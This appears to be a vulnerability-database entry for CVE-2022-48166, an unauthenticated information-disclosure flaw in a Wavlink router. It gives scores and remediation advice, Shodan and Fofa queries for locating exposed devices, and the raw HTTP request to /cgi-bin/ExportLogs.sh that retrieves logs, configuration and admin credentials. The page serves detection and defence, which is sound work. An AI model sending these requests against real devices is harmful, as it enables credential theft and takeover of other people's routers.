🔙 목록으로 돌아가기

CVE-2022-48166: Wavlink WL-WN530HG4 M30HG4.V5030.201217 - Information Disclosure

TitleWavlink WL-WN530HG4 M30HG4.V5030.201217 - Information Disclosure
Authorritikchaddha
SeverityHigh
ImpactSuccessful exploitation could lead to sensitive information disclosure.
RemediationApply the latest firmware updates from Wavlink or implement network segmentation to restrict access to the device administration interface.
CVSS Score7.5
EPSS Score0.73259
CVE IDCVE-2022-48166
Shodan Queryhtml:"WN530HG4"
Fofa Querybody="WN530HG4"
Tags cve cve2022 wavlink exposure wn530hg4 vuln

🔍 Vulnerability Description

An access control issue in Wavlink WL-WN530HG4 M30HG4.V5030.201217 allows unauthenticated attackers to download configuration data and log files and obtain admin credentials.

🌐 HTTP Request

GET / HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /cgi-bin/ExportLogs.sh HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-48166.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-48166.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A